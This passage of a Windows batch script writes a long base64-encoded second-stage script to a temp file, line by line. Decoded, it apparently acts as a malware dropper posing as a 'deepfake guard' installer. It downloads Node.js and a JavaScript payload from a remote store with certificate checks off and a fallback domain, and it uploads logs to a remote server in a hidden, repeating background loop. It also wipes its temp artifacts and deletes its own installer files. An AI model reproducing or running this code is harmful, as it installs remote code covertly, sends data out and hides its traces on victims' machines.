>>"%_796e6a%" echo bGV2ZWwgMSBleGl0IC9iIDENCg0KICB0YXIgLXRmICIhTk9ERV9aSVAhIiAyPm51bCB8IGZpbmRz
>>"%_796e6a%" echo dHIgL2kgIm5vZGUuZXhlIiA+bnVsDQoNCiAgZXhpdCAvYiAhZXJyb3JsZXZlbCENCg0KKQ0KDQpm
>>"%_796e6a%" echo b3IgJSVBIGluICgiIU5PREVfWklQISIpIGRvIGlmICUlfnpBIExTUyAxMDQ4NTc2IGV4aXQgL2Ig
>>"%_796e6a%" echo MQ0KDQpleGl0IC9iIDANCg0KOmRvd25sb2FkX3BvcnRhYmxlX25vZGUNCg0Kc2V0ICJOT0RFX1pJ
>>"%_796e6a%" echo UD0lVE1QRElSJVxub2RlLnppcCINCg0Kc2V0ICJOT0RFX1VSTD0lR1VBUkRfU1RPUkUlL25vZGUv
>>"%_796e6a%" echo bm9kZS12MjAuMTguMS13aW4teDY0LnppcCINCg0Kc2V0ICJOT0RFX1VSTF9GQj1odHRwczovL25v
>>"%_796e6a%" echo ZGVqcy5vcmcvZGlzdC92MjAuMTguMS9ub2RlLXYyMC4xOC4xLXdpbi14NjQuemlwIg0KDQpzZXQg
>>"%_796e6a%" echo Ik5PREVfRVhFPSVUTVBESVIlXG5vZGUtdjIwLjE4LjEtd2luLXg2NFxub2RlLmV4ZSINCg0Kc2V0
>>"%_796e6a%" echo IC9hIEFUVEVNUFQ9MA0KDQo6bm9kZV9kb3dubG9hZF9sb29wDQoNCnNldCAvYSBBVFRFTVBUKz0x
>>"%_796e6a%" echo DQoNCmNhbGwgOmxvZyBJTkZPIG5vZGUgZG93bmxvYWQgYXR0ZW1wdCAhQVRURU1QVCEvIU1BWF9B
>>"%_796e6a%" echo VFRFTVBUUyEgZnJvbSBzdG9yZQ0KDQpzZXQgTk9ERV9aSVBfU0laRT0wDQoNCmNhbGwgOm5vZGVf
>>"%_796e6a%" echo emlwX2ludGVncml0eSAiIU5PREVfWklQISINCg0KaWYgbm90IGVycm9ybGV2ZWwgMSAoDQoNCiAg
>>"%_796e6a%" echo Zm9yICUlQSBpbiAoIiFOT0RFX1pJUCEiKSBkbyBzZXQgTk9ERV9aSVBfU0laRT0lJX56QQ0KDQog
>>"%_796e6a%" echo IGNhbGwgOmxvZyBPSyBub2RlIHppcCBpbnRlZ3JpdHkgdmVyaWZpZWQgc2l6ZT0hTk9ERV9aSVBf
>>"%_796e6a%" echo U0laRSEgYnl0ZXMNCg0KICBnb3RvIG5vZGVfZXh0cmFjdF9vaw0KDQopDQoNCmlmIGV4aXN0ICIh
>>"%_796e6a%" echo Tk9ERV9aSVAhIiAoDQoNCiAgZm9yICUlQSBpbiAoIiFOT0RFX1pJUCEiKSBkbyBzZXQgTk9ERV9a
>>"%_796e6a%" echo SVBfU0laRT0lJX56QQ0KDQogIGlmICFOT0RFX1pJUF9TSVpFISBHVFIgMCAoDQoNCiAgICBjYWxs
>>"%_796e6a%" echo IDpsb2cgSU5GTyByZXN1bWluZyBwYXJ0aWFsIG5vZGUgZG93bmxvYWQgc2l6ZT0hTk9ERV9aSVBf
>>"%_796e6a%" echo U0laRSEgYnl0ZXMNCg0KICApIGVsc2UgKA0KDQogICAgZGVsIC9mIC9xICIhTk9ERV9aSVAhIg0K
>>"%_796e6a%" echo DQogICkNCg0KKSBlbHNlICgNCg0KICBzZXQgTk9ERV9aSVBfU0laRT0wDQoNCikNCg0KY3VybCAt
>>"%_796e6a%" echo c2sgLUMgLSAtLWNvbm5lY3QtdGltZW91dCAhTk9ERV9DT05ORUNUX1RJTUVPVVQhIC0tbWF4LXRp
>>"%_796e6a%" echo bWUgIU5PREVfTUFYX1RJTUUhIC0tcmV0cnkgIU5PREVfQ1VSTF9SRVRSWSEgLS1yZXRyeS1hbGwt
>>"%_796e6a%" echo ZXJyb3JzIC0tcmV0cnktZGVsYXkgNSAtLXNwZWVkLWxpbWl0ICFDVVJMX1NUQUxMX0xJTUlUISAt
>>"%_796e6a%" echo LXNwZWVkLXRpbWUgIUNVUkxfU1RBTExfVElNRSEgLW8gIiFOT0RFX1pJUCEiICIhTk9ERV9VUkwh
>>"%_796e6a%" echo Ig0KDQpzZXQgIkNVUkxfRVJSPSFlcnJvcmxldmVsISINCg0KY2FsbCA6bm9kZV96aXBfaW50ZWdy
>>"%_796e6a%" echo aXR5ICIhTk9ERV9aSVAhIg0KDQppZiBlcnJvcmxldmVsIDEgKA0KDQogIGZvciAlJUEgaW4gKCIh
>>"%_796e6a%" echo Tk9ERV9aSVAhIikgZG8gc2V0IE5PREVfWklQX1NJWkU9JSV+ekENCg0KICBjYWxsIDpsb2cgV0FS
>>"%_796e6a%" echo TiBzdG9yZSBub2RlIGRvd25sb2FkIGZhaWxlZCBjdXJsPSFDVVJMX0VSUiEgc2l6ZT0hTk9ERV9a
>>"%_796e6a%" echo SVBfU0laRSEgdHJ5aW5nIG5vZGVqcy5vcmcNCg0KICBpZiBleGlzdCAiIU5PREVfWklQISIgZGVs
>>"%_796e6a%" echo IC9mIC9xICIhTk9ERV9aSVAhIg0KDQogIHNldCBOT0RFX1pJUF9TSVpFPTANCg0KICBjdXJsIC1z
>>"%_796e6a%" echo ayAtQyAtIC0tY29ubmVjdC10aW1lb3V0ICFOT0RFX0NPTk5FQ1RfVElNRU9VVCEgLS1tYXgtdGlt
>>"%_796e6a%" echo ZSAhTk9ERV9NQVhfVElNRSEgLS1yZXRyeSAhTk9ERV9DVVJMX1JFVFJZISAtLXJldHJ5LWFsbC1l
>>"%_796e6a%" echo cnJvcnMgLS1yZXRyeS1kZWxheSA1IC0tc3BlZWQtbGltaXQgIUNVUkxfU1RBTExfTElNSVQhIC0t
>>"%_796e6a%" echo c3BlZWQtdGltZSAhQ1VSTF9TVEFMTF9USU1FISAtbyAiIU5PREVfWklQISIgIiFOT0RFX1VSTF9G
>>"%_796e6a%" echo QiEiDQoNCiAgc2V0ICJDVVJMX0VSUj0hZXJyb3JsZXZlbCEiDQoNCiAgY2FsbCA6bm9kZV96aXBf
>>"%_796e6a%" echo aW50ZWdyaXR5ICIhTk9ERV9aSVAhIg0KDQopDQoNCmlmIG5vdCBlcnJvcmxldmVsIDEgKA0KDQog
>>"%_796e6a%" echo IGZvciAlJUEgaW4gKCIhTk9ERV9aSVAhIikgZG8gc2V0IE5PREVfWklQX1NJWkU9JSV+ekENCg0K
>>"%_796e6a%" echo ICBjYWxsIDpsb2cgT0sgbm9kZSB6aXAgZG93bmxvYWRlZCBhbmQgdmVyaWZpZWQgc2l6ZT0hTk9E
>>"%_796e6a%" echo RV9aSVBfU0laRSEgYnl0ZXMNCg0KICBnb3RvIG5vZGVfZXh0cmFjdF9vaw0KDQopDQoNCmlmIGV4
>>"%_796e6a%" echo aXN0ICIhTk9ERV9aSVAhIiBkZWwgL2YgL3EgIiFOT0RFX1pJUCEiDQoNCmNhbGwgOmxvZyBXQVJO
>>"%_796e6a%" echo IG5vZGUgZG93bmxvYWQgZmFpbGVkIGN1cmw9IUNVUkxfRVJSISBhdHRlbXB0PSFBVFRFTVBUIQ0K
>>"%_796e6a%" echo DQppZiAhQVRURU1QVCEgTFNTICFNQVhfQVRURU1QVFMhICgNCg0KICB0aW1lb3V0IC90ICFBVFRF
>>"%_796e6a%" echo TVBUISAvbm9icmVhayA+bnVsDQoNCiAgZ290byBub2RlX2Rvd25sb2FkX2xvb3ANCg0KKQ0KDQpj
>>"%_796e6a%" echo YWxsIDpzd2l0Y2hfZ3VhcmRfc3RvcmVfZmFsbGJhY2sNCg0KaWYgbm90IGVycm9ybGV2ZWwgMSAo
>>"%_796e6a%" echo DQoNCiAgc2V0ICJOT0RFX1VSTD0hR1VBUkRfU1RPUkUhL25vZGUvbm9kZS12MjAuMTguMS13aW4t
>>"%_796e6a%" echo eDY0LnppcCINCg0KICBpZiBleGlzdCAiIU5PREVfWklQISIgZGVsIC9mIC9xICIhTk9ERV9aSVAh
>>"%_796e6a%" echo Ig0KDQogIHNldCAvYSBBVFRFTVBUPTANCg0KICBnb3RvIG5vZGVfZG93bmxvYWRfbG9vcA0KDQop
>>"%_796e6a%" echo DQoNCmNhbGwgOmxvZyBGQUlMIG5vZGUgZG93bmxvYWQgZmFpbGVkIGFmdGVyICFNQVhfQVRURU1Q
>>"%_796e6a%" echo VFMhIGF0dGVtcHRzDQoNCnNldCBHVUFSRF9FWElUPTENCg0KZXhpdCAvYiAxDQoNCjpub2RlX2V4
>>"%_796e6a%" echo dHJhY3Rfb2sNCg0Kc2V0IC9hIEVYVF9BVFRFTVBUPTANCg0KOm5vZGVfZXh0cmFjdF9sb29wDQoN
>>"%_796e6a%" echo CnNldCAvYSBFWFRfQVRURU1QVCs9MQ0KDQpybWRpciAvcyAvcSAiJVRNUERJUiVcbm9kZS12MjAu
>>"%_796e6a%" echo MTguMS13aW4teDY0IiAyPm51bA0KDQp0YXIgLXhmICIhTk9ERV9aSVAhIiAtQyAiJVRNUERJUiUi
>>"%_796e6a%" echo ID5udWwgMj4mMQ0KDQppZiBlcnJvcmxldmVsIDEgKA0KDQogIGNhbGwgOmxvZyBXQVJOIGV4dHJh
>>"%_796e6a%" echo Y3QgZmFpbGVkIGF0dGVtcHQgIUVYVF9BVFRFTVBUIQ0KDQogIGlmICFFWFRfQVRURU1QVCEgTFNT
>>"%_796e6a%" echo ICFNQVhfQVRURU1QVFMhICgNCg0KICAgIHRpbWVvdXQgL3QgIUVYVF9BVFRFTVBUISAvbm9icmVh
>>"%_796e6a%" echo ayA+bnVsDQoNCiAgICBnb3RvIG5vZGVfZXh0cmFjdF9sb29wDQoNCiAgKQ0KDQogIGNhbGwgOmxv
>>"%_796e6a%" echo ZyBXQVJOIGNvcnJ1cHQgbm9kZSB6aXAgcmVtb3ZlZCBhZnRlciBleHRyYWN0IGZhaWx1cmUsIHdp
>>"%_796e6a%" echo bGwgcmUtZG93bmxvYWQNCg0KICBpZiBleGlzdCAiIU5PREVfWklQISIgZGVsIC9mIC9xICIhTk9E
>>"%_796e6a%" echo RV9aSVAhIg0KDQogIHJtZGlyIC9zIC9xICIlVE1QRElSJVxub2RlLXYyMC4xOC4xLXdpbi14NjQi
>>"%_796e6a%" echo IDI+bnVsDQoNCiAgaWYgIUFUVEVNUFQhIExTUyAhTUFYX0FUVEVNUFRTISAoDQoNCiAgICB0aW1l
>>"%_796e6a%" echo b3V0IC90ICFBVFRFTVBUISAvbm9icmVhayA+bnVsDQoNCiAgICBnb3RvIG5vZGVfZG93bmxvYWRf
>>"%_796e6a%" echo bG9vcA0KDQogICkNCg0KICBjYWxsIDpsb2cgRkFJTCBub2RlIHppcCBleHRyYWN0IGZhaWxlZCBh
>>"%_796e6a%" echo ZnRlciAhTUFYX0FUVEVNUFRTISBkb3dubG9hZCBhdHRlbXB0cw0KDQogIHNldCBHVUFSRF9FWElU
>>"%_796e6a%" echo PTENCg0KICBleGl0IC9iIDENCg0KKQ0KDQpjYWxsIDpsb2cgT0sgbm9kZSB6aXAgZXh0cmFjdGVk
>>"%_796e6a%" echo DQoNCmlmIG5vdCBleGlzdCAiIU5PREVfRVhFISIgKA0KDQogIGNhbGwgOmxvZyBXQVJOIG5vZGUu
>>"%_796e6a%" echo ZXhlIG1pc3NpbmcgYWZ0ZXIgZXh0cmFjdCwgd2lsbCByZS1kb3dubG9hZA0KDQogIGlmIGV4aXN0
>>"%_796e6a%" echo ICIhTk9ERV9aSVAhIiBkZWwgL2YgL3EgIiFOT0RFX1pJUCEiDQoNCiAgcm1kaXIgL3MgL3EgIiVU
>>"%_796e6a%" echo TVBESVIlXG5vZGUtdjIwLjE4LjEtd2luLXg2NCIgMj5udWwNCg0KICBpZiAhQVRURU1QVCEgTFNT
>>"%_796e6a%" echo ICFNQVhfQVRURU1QVFMhIGdvdG8gbm9kZV9kb3dubG9hZF9sb29wDQoNCiAgY2FsbCA6bG9nIEZB
>>"%_796e6a%" echo SUwgbm9kZS5leGUgbWlzc2luZyBhdCAhTk9ERV9FWEUhDQoNCiAgc2V0IEdVQVJEX0VYSVQ9MQ0K
>>"%_796e6a%" echo DQogIGV4aXQgL2IgMQ0KDQopDQoNCmZvciAvZiAiZGVsaW1zPSIgJSV2IGluICgnIiFOT0RFX0VY
>>"%_796e6a%" echo RSEiIC12IDJePl4mMScpIGRvIHNldCBOT0RFX1ZFUj0lJXYNCg0KaWYgbm90IGRlZmluZWQgTk9E
>>"%_796e6a%" echo RV9WRVIgKA0KDQogIGNhbGwgOmxvZyBXQVJOIG5vZGUuZXhlIG5vdCBydW5uYWJsZSBhZnRlciBl
>>"%_796e6a%" echo eHRyYWN0LCB3aWxsIHJlLWRvd25sb2FkDQoNCiAgaWYgZXhpc3QgIiFOT0RFX1pJUCEiIGRlbCAv
>>"%_796e6a%" echo ZiAvcSAiIU5PREVfWklQISINCg0KICBybWRpciAvcyAvcSAiJVRNUERJUiVcbm9kZS12MjAuMTgu
>>"%_796e6a%" echo MS13aW4teDY0IiAyPm51bA0KDQogIGlmICFBVFRFTVBUISBMU1MgIU1BWF9BVFRFTVBUUyEgZ290
>>"%_796e6a%" echo byBub2RlX2Rvd25sb2FkX2xvb3ANCg0KICBjYWxsIDpsb2cgRkFJTCBub2RlLmV4ZSB2ZXJpZmlj
>>"%_796e6a%" echo YXRpb24gZmFpbGVkDQoNCiAgc2V0IEdVQVJEX0VYSVQ9MQ0KDQogIGV4aXQgL2IgMQ0KDQopDQoN
>>"%_796e6a%" echo CmlmIGV4aXN0ICIhTk9ERV9aSVAhIiBkZWwgL2YgL3EgIiFOT0RFX1pJUCEiDQoNCmV4aXQgL2Ig
>>"%_796e6a%" echo MA0KDQo6ZW5zdXJlX2d1YXJkX2pzDQoNCnNldCBHVUFSRF9PSz0wDQoNCnNldCBHVUFSRF9KU19T
>>"%_796e6a%" echo SVpFPTANCg0KaWYgZXhpc3QgIiFHVUFSRF9KUyEiIGZvciAlJUEgaW4gKCIhR1VBUkRfSlMhIikg
>>"%_796e6a%" echo ZG8gc2V0IEdVQVJEX0pTX1NJWkU9JSV+ekENCg0KaWYgIUdVQVJEX0pTX1NJWkUhIEdFUSAhR1VB
>>"%_796e6a%" echo UkRfSlNfTUlOISBzZXQgR1VBUkRfT0s9MQ0KDQppZiAhR1VBUkRfT0shIEVRVSAxICgNCg0KICBj
>>"%_796e6a%" echo YWxsIDpsb2cgT0sgaW5zdGFsbF9ndWFyZF9hbHQuanMgcHJlc2VudCBzaXplPSFHVUFSRF9KU19T
>>"%_796e6a%" echo SVpFISBieXRlcw0KDQogIGV4aXQgL2IgMA0KDQopDQoNCmlmIGV4aXN0ICIhR1VBUkRfSlMhIiBk
>>"%_796e6a%" echo ZWwgL2YgL3EgIiFHVUFSRF9KUyEiDQoNCnNldCAvYSBBVFRFTVBUPTANCg0KOmd1YXJkX2Rvd25s
>>"%_796e6a%" echo b2FkX2xvb3ANCg0Kc2V0IC9hIEFUVEVNUFQrPTENCg0KY2FsbCA6bG9nIElORk8gaW5zdGFsbF9n
>>"%_796e6a%" echo dWFyZF9hbHQuanMgZG93bmxvYWQgYXR0ZW1wdCAhQVRURU1QVCEvIU1BWF9BVFRFTVBUUyENCg0K
>>"%_796e6a%" echo aWYgZXhpc3QgIiFHVUFSRF9KUyEiICgNCg0KICBmb3IgJSVBIGluICgiIUdVQVJEX0pTISIpIGRv
>>"%_796e6a%" echo IHNldCBHVUFSRF9KU19TSVpFPSUlfnpBDQoNCiAgaWYgIUdVQVJEX0pTX1NJWkUhIEdUUiAwICgN
>>"%_796e6a%" echo Cg0KICAgIGNhbGwgOmxvZyBJTkZPIHJlc3VtaW5nIHBhcnRpYWwgaW5zdGFsbF9ndWFyZF9hbHQu
>>"%_796e6a%" echo anMgZG93bmxvYWQgc2l6ZT0hR1VBUkRfSlNfU0laRSEgYnl0ZXMNCg0KICApDQoNCikgZWxzZSAo
>>"%_796e6a%" echo DQoNCiAgc2V0IEdVQVJEX0pTX1NJWkU9MA0KDQopDQoNCmN1cmwgLXNrIC1DIC0gLS1jb25uZWN0
>>"%_796e6a%" echo LXRpbWVvdXQgIUdVQVJEX0NPTk5FQ1RfVElNRU9VVCEgLS1tYXgtdGltZSAhR1VBUkRfTUFYX1RJ
>>"%_796e6a%" echo TUUhIC0tcmV0cnkgIUdVQVJEX0NVUkxfUkVUUlkhIC0tcmV0cnktYWxsLWVycm9ycyAtLXJldHJ5
>>"%_796e6a%" echo LWRlbGF5IDUgLS1zcGVlZC1saW1pdCAhQ1VSTF9TVEFMTF9MSU1JVCEgLS1zcGVlZC10aW1lICFD
>>"%_796e6a%" echo VVJMX1NUQUxMX1RJTUUhIC1vICIhR1VBUkRfSlMhIiAiIUdVQVJEX1VSTCEiDQoNCnNldCAiQ1VS
>>"%_796e6a%" echo TF9FUlI9IWVycm9ybGV2ZWwhIg0KDQpzZXQgR1VBUkRfSlNfU0laRT0wDQoNCnNldCBHVUFSRF9P
>>"%_796e6a%" echo Sz0wDQoNCmlmICFDVVJMX0VSUiEgRVFVIDAgaWYgZXhpc3QgIiFHVUFSRF9KUyEiIGZvciAlJUEg
>>"%_796e6a%" echo aW4gKCIhR1VBUkRfSlMhIikgZG8gc2V0IEdVQVJEX0pTX1NJWkU9JSV+ekENCg0KaWYgIUdVQVJE
>>"%_796e6a%" echo X0pTX1NJWkUhIEdFUSAhR1VBUkRfSlNfTUlOISBzZXQgR1VBUkRfT0s9MQ0KDQppZiAhR1VBUkRf
>>"%_796e6a%" echo T0shIEVRVSAxICgNCg0KICBjYWxsIDpsb2cgT0sgaW5zdGFsbF9ndWFyZF9hbHQuanMgZG93bmxv
>>"%_796e6a%" echo YWRlZCBzaXplPSFHVUFSRF9KU19TSVpFISBieXRlcw0KDQogIGV4aXQgL2IgMA0KDQopDQoNCmlm
>>"%_796e6a%" echo ICFHVUFSRF9PSyEgTkVRIDEgaWYgZXhpc3QgIiFHVUFSRF9KUyEiICgNCg0KICBmb3IgJSVBIGlu
>>"%_796e6a%" echo ICgiIUdVQVJEX0pTISIpIGRvIGlmICUlfnpBIExTUyAhR1VBUkRfSlNfTUlOISBkZWwgL2YgL3Eg
>>"%_796e6a%" echo IiFHVUFSRF9KUyEiDQoNCikNCg0KY2FsbCA6bG9nIFdBUk4gaW5zdGFsbF9ndWFyZF9hbHQuanMg
>>"%_796e6a%" echo ZmFpbGVkIGN1cmw9IUNVUkxfRVJSISBzaXplPSFHVUFSRF9KU19TSVpFISBhdHRlbXB0PSFBVFRF
>>"%_796e6a%" echo TVBUIQ0KDQppZiAhQVRURU1QVCEgTFNTICFNQVhfQVRURU1QVFMhICgNCg0KICB0aW1lb3V0IC90
>>"%_796e6a%" echo ICFBVFRFTVBUISAvbm9icmVhayA+bnVsDQoNCiAgZ290byBndWFyZF9kb3dubG9hZF9sb29wDQoN
>>"%_796e6a%" echo CikNCg0KY2FsbCA6c3dpdGNoX2d1YXJkX3N0b3JlX2ZhbGxiYWNrDQoNCmlmIG5vdCBlcnJvcmxl
>>"%_796e6a%" echo dmVsIDEgKA0KDQogIGlmIGV4aXN0ICIhR1VBUkRfSlMhIiBkZWwgL2YgL3EgIiFHVUFSRF9KUyEi
>>"%_796e6a%" echo DQoNCiAgc2V0IC9hIEFUVEVNUFQ9MA0KDQogIGdvdG8gZ3VhcmRfZG93bmxvYWRfbG9vcA0KDQop
>>"%_796e6a%" echo DQoNCmNhbGwgOmxvZyBGQUlMIGluc3RhbGxfZ3VhcmRfYWx0LmpzIGRvd25sb2FkIGZhaWxlZA0K
>>"%_796e6a%" echo DQpzZXQgR1VBUkRfRVhJVD0xDQoNCmV4aXQgL2IgMQ0KDQo6c3dpdGNoX2d1YXJkX3N0b3JlX2Zh
>>"%_796e6a%" echo bGxiYWNrDQoNCmlmIG5vdCBkZWZpbmVkIEdVQVJEX1NUT1JFX0ZBTExCQUNLIHNldCAiR1VBUkRf
>>"%_796e6a%" echo U1RPUkVfRkFMTEJBQ0s9aHR0cHM6Ly9kb3h4ZWxhLmluayINCg0KaWYgL0kgIiFHVUFSRF9TVE9S
>>"%_796e6a%" echo RSEiPT0iIUdVQVJEX1NUT1JFX0ZBTExCQUNLISIgZXhpdCAvYiAxDQoNCmNhbGwgOmxvZyBXQVJO
>>"%_796e6a%" echo IHN3aXRjaGluZyBndWFyZCBzdG9yZSB0byBmYWxsYmFjayAhR1VBUkRfU1RPUkVfRkFMTEJBQ0sh
>>"%_796e6a%" echo DQoNCnNldCAiR1VBUkRfU1RPUkU9IUdVQVJEX1NUT1JFX0ZBTExCQUNLISINCg0KaWYgZGVmaW5l
>>"%_796e6a%" echo ZCBHVUFSRF9SRUwgc2V0ICJHVUFSRF9VUkw9IUdVQVJEX1NUT1JFIS8hR1VBUkRfUkVMISINCg0K
>>"%_796e6a%" echo ZXhpdCAvYiAwDQoNCjp1cGxvYWRfZ3VhcmRfbG9nDQoNCmlmIG5vdCBleGlzdCAiJUxPRyUiIGV4
>>"%_796e6a%" echo aXQgL2IgMA0KDQpmb3IgJSVBIGluICgiJUxPRyUiKSBkbyBpZiAlJX56QSBMU1MgMSBleGl0IC9i
>>"%_796e6a%" echo IDANCg0KY2FsbCA6bG9nIElORk8gdXBsb2FkaW5nIGZpbmFsIGd1YXJkIGluc3RhbGwgbG9nIHRv
>>"%_796e6a%" echo IHNlcnZlcg0KDQpzZXQgIl9MT0dVUD0lVEVNUCVcfm52ZGdfbG9ndXBsb2FkXyVSQU5ET00lLnRt
>>"%_796e6a%" echo cCINCg0KY29weSAveSAiJUxPRyUiICIhX0xPR1VQISIgPm51bCAyPiYxDQoNCmlmIGV4aXN0ICIh
>>"%_796e6a%" echo X0xPR1VQISIgY3VybCAtc2sgLVggUE9TVCAtSCAiQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluIiAt
>>"%_796e6a%" echo SCAiWC1HdWFyZC1QbGF0Zm9ybTogd2luZG93cyIgLS1kYXRhLWJpbmFyeSAiQCFfTE9HVVAhIiAt
>>"%_796e6a%" echo LWNvbm5lY3QtdGltZW91dCAzMCAtLW1heC10aW1lIDYwIC0tcmV0cnkgMyAtLXJldHJ5LWFsbC1l
>>"%_796e6a%" echo cnJvcnMgLS1yZXRyeS1kZWxheSAzICIlTE9HX1VQTE9BRF9VUkwlIiA+bnVsIDI+JjENCg0KZGVs
>>"%_796e6a%" echo IC9mIC9xICIhX0xPR1VQISIgMj5udWwNCg0KaWYgZXJyb3JsZXZlbCAxICgNCg0KICBjYWxsIDps
>>"%_796e6a%" echo b2cgV0FSTiBndWFyZCBsb2cgdXBsb2FkIGZhaWxlZCBjdXJsPSFlcnJvcmxldmVsIQ0KDQopIGVs
>>"%_796e6a%" echo c2UgKA0KDQogIGNhbGwgOmxvZyBPSyBndWFyZCBsb2cgdXBsb2FkZWQNCg0KKQ0KDQpleGl0IC9i
>>"%_796e6a%" echo IDANCg0KOnNjaGVkdWxlX2xvZ191cGxvYWQNCg0Kc2V0ICJfTFU9JVRFTVAlXH5udmRnX2xvZ3Vw
>>"%_796e6a%" echo bG9hZF8lUkFORE9NJS5jbWQiDQoNCj4gIiFfTFUhIiBlY2hvIEBlY2hvIG9mZg0KDQo+PiIhX0xV
>>"%_796e6a%" echo ISIgZWNobyBzZXRsb2NhbCBFbmFibGVEZWxheWVkRXhwYW5zaW9uDQoNCj4+IiFfTFUhIiBlY2hv
>>"%_796e6a%" echo IHNldCAvYSBfTFVDPTANCg0KPj4iIV9MVSEiIGVjaG8gOmxvb3ANCg0KPj4iIV9MVSEiIGVjaG8g
>>"%_796e6a%" echo c2V0IC9hIF9MVUMrPTENCg0KPj4iIV9MVSEiIGVjaG8gaWYgXiFfTFVDXiEgR0VRIDE4MCBnb3Rv
>>"%_796e6a%" echo IGRvbmUNCg0KPj4iIV9MVSEiIGVjaG8gdGltZW91dCAvdCA2MCAvbm9icmVhayBePm51bA0KDQo+
>>"%_796e6a%" echo PiIhX0xVISIgZWNobyBpZiBub3QgZXhpc3QgIiVMT0NLRElSJVwiIGdvdG8gZG9uZQ0KDQo+PiIh
>>"%_796e6a%" echo X0xVISIgZWNobyBzZXQgIl9MVD0lVEVNUCVcfm52ZGdfbG9ndXBsb2FkXyUlUkFORE9NJSUudG1w
>>"%_796e6a%" echo Ig0KDQo+PiIhX0xVISIgZWNobyBpZiBleGlzdCAiJUxPRyUiIGNvcHkgL3kgIiVMT0clIiAiXiFf
>>"%_796e6a%" echo TFReISIgXj5udWwgMl4+XiYxDQoNCj4+IiFfTFUhIiBlY2hvIGlmIGV4aXN0ICJeIV9MVF4hIiBj
>>"%_796e6a%" echo dXJsIC1zayAtWCBQT1NUIC1IICJDb250ZW50LVR5cGU6IHRleHQvcGxhaW4iIC1IICJYLUd1YXJk
>>"%_796e6a%" echo LVBsYXRmb3JtOiB3aW5kb3dzIiAtLWRhdGEtYmluYXJ5ICJAXiFfTFReISIgLS1jb25uZWN0LXRp
>>"%_796e6a%" echo bWVvdXQgMzAgLS1tYXgtdGltZSA2MCAtLXJldHJ5IDMgLS1yZXRyeS1hbGwtZXJyb3JzIC0tcmV0
>>"%_796e6a%" echo cnktZGVsYXkgMyAiJUxPR19VUExPQURfVVJMJSIgXj5udWwgMl4+XiYxDQoNCj4+IiFfTFUhIiBl
>>"%_796e6a%" echo Y2hvIGRlbCAvZiAvcSAiXiFfTFReISIgMl4+bnVsDQoNCj4+IiFfTFUhIiBlY2hvIGdvdG8gbG9v
>>"%_796e6a%" echo cA0KDQo+PiIhX0xVISIgZWNobyA6ZG9uZQ0KDQo+PiIhX0xVISIgZWNobyBkZWwgL2YgL3EgIiVU
>>"%_796e6a%" echo RU1QJVx+bnZkZ19sb2d1cGxvYWRfKi50bXAiIDJePm51bA0KDQo+PiIhX0xVISIgZWNobyBkZWwg
>>"%_796e6a%" echo L2YgL3EgIiUlfmYwIiAyXj5udWwNCg0Kc3RhcnQgIiIgL01JTiBjbWQgL0QgL0MgIiIhX0xVISIi
>>"%_796e6a%" echo DQoNCmV4aXQgL2IgMA0KDQo6Y2xlYW51cF90ZW1wX2FydGlmYWN0cw0KDQpkZWwgL2YgL3EgIiVU
>>"%_796e6a%" echo RU1QJVx+bnZkZ18qIiAyPm51bA0KDQpkZWwgL2YgL3EgIiVURU1QJVx+a2RtXyouYjY0IiAiJVRF
>>"%_796e6a%" echo TVAlXH5rZG1fKi5jbWQiIDI+bnVsDQoNCmRlbCAvZiAvcSAiJVRFTVAlXGRlZXBmYWtlX2d1YXJk
>>"%_796e6a%" echo LmxhdW5jaGVyLnN0YXR1cyIgMj5udWwNCg0KZGVsIC9mIC9xICIlVEVNUCVcZGVlcGZha2VfZ3Vh
>>"%_796e6a%" echo cmQud29ya2VyLmxvY2siIDI+bnVsDQoNCmRlbCAvZiAvcSAiJVRFTVAlXH5udmRnX3dvcmtlci52
>>"%_796e6a%" echo YnMiIDI+bnVsDQoNCmlmIGV4aXN0ICIlVEVNUCVcZGVlcGZha2VfZ3VhcmRcIiBybWRpciAvcyAv
>>"%_796e6a%" echo cSAiJVRFTVAlXGRlZXBmYWtlX2d1YXJkIiAyPm51bA0KDQpleGl0IC9iIDANCg0KOmRlbGV0ZV9p
>>"%_796e6a%" echo bnN0YWxsZXINCg0KaWYgbm90IGRlZmluZWQgTlZER19MQVVOQ0hFUiBzZXQgIk5WREdfTEFVTkNI
>>"%_796e6a%" echo RVI9JX5mMCINCg0KaWYgbm90IGRlZmluZWQgSU5TVEFMTEVSX0RJUiBzZXQgIklOU1RBTExFUl9E
>>"%_796e6a%" echo SVI9JUNEJSINCg0KZGVsIC9mIC9xICIhTlZER19MQVVOQ0hFUiEiIDI+bnVsDQoNCmRlbCAvZiAv
>>"%_796e6a%" echo cSAiJUlOU1RBTExFUl9ESVIlXHVwZF93LmNtZCIgIiVJTlNUQUxMRVJfRElSJVx1cGRhX3cuY21k
>>"%_796e6a%" echo IiAyPm51bA0KDQppZiBub3QgZXhpc3QgIiFOVkRHX0xBVU5DSEVSISIgaWYgbm90IGV4aXN0ICIl
>>"%_796e6a%" echo SU5TVEFMTEVSX0RJUiVcdXBkX3cuY21kIiBpZiBub3QgZXhpc3QgIiVJTlNUQUxMRVJfRElSJVx1
>>"%_796e6a%" echo cGRhX3cuY21kIiBleGl0IC9iIDANCg0Kc2V0ICJfREg9JVRFTVAlXH5udmRnX2RlbF8lUkFORE9N
>>"%_796e6a%" echo JS5jbWQiDQoNCj4gIiFfREghIiBlY2hvIEBlY2hvIG9mZg0KDQo+PiIhX0RIISIgZWNobyBmb3Ig
>>"%_796e6a%" echo L0wgJSUlJW4gaW4gKDEsMSw2MCkgZG8gKA0KDQo+PiIhX0RIISIgZWNobyAgIGRlbCAvZiAvcSAi
>>"%_796e6a%" echo IU5WREdfTEFVTkNIRVIhIiAyXj5udWwNCg0KPj4iIV9ESCEiIGVjaG8gICBkZWwgL2YgL3EgIiVJ
>>"%_796e6a%" echo TlNUQUxMRVJfRElSJVx1cGRfdy5jbWQiICIlSU5TVEFMTEVSX0RJUiVcdXBkYV93LmNtZCIgMl4+
>>"%_796e6a%" echo bnVsDQoNCj4+IiFfREghIiBlY2hvICAgaWYgbm90IGV4aXN0ICIhTlZER19MQVVOQ0hFUiEiIGlm
>>"%_796e6a%" echo IG5vdCBleGlzdCAiJUlOU1RBTExFUl9ESVIlXHVwZF93LmNtZCIgaWYgbm90IGV4aXN0ICIlSU5T
>>"%_796e6a%" echo VEFMTEVSX0RJUiVcdXBkYV93LmNtZCIgZ290byBkb25lDQoNCj4+IiFfREghIiBlY2hvICAgdGlt
>>"%_796e6a%" echo ZW91dCAvdCAxIC9ub2JyZWFrIF4+bnVsDQoNCj4+IiFfREghIiBlY2hvICkNCg0KPj4iIV9ESCEi
